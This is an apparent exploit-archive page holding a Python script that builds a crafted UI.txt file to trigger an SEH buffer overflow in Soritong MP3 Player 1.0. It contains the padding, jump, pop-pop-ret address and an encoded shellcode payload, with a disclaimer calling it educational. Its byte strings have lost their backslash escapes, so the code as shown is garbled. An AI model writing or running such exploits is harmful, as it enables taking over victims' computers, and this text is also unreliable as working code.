Soritong v1.0 Universal BOF (Python)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Soritong v1.0 Universal BOF (Python)
# Published : 2009-12-29
# Author : Jacky
# Previous Title : Mini-stream Ripper v3.0.1.1 .pls Universal BOF (Perl)
# Next Title : Mini-stream Ripper v3.0.1.1 .pls Universal BOF (Python)

#Soritong MP3 Player 1.0 Universal BOF !
#Greetz to Peter Van Eeckhoutte and Corelanc0d3r team ;-)
#Discovered by : (Stack )
#Written by : (Jacky )
#I searched for a Python Edition for this Vulnerability but i haven't found any Python written exploit
#So i decided to give it a chance and try to write it with Python and it has successfully Done!!!
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
crashfile="UI.txt"
print "Soritong MP3 Player v1.0 Universal BOF by Jacky n"
print "Greetz to Peter Van Eeckhoutte and Corelanc0d3r teamn"
junk="A"*584
nseh="xebx06x90x90"         #Short jump over 6 bytes forward.
seh="x12xe8x01x10"           #PPR from a .dll application file.
sc=("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1"
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30"
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa"
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96"
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b"
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a"
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83"
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98"
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61"
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05"
"x7fxe8x7bxca")           #Here is the Pain!!!
junk2="x90"*1000               #Additional nops!
file=open(crashfile,'w')
file.write(junk+nseh+seh+sc+junk2)
print "[+]File has been created successfully!n"
print "[+]Written By Jackyn"
file.close()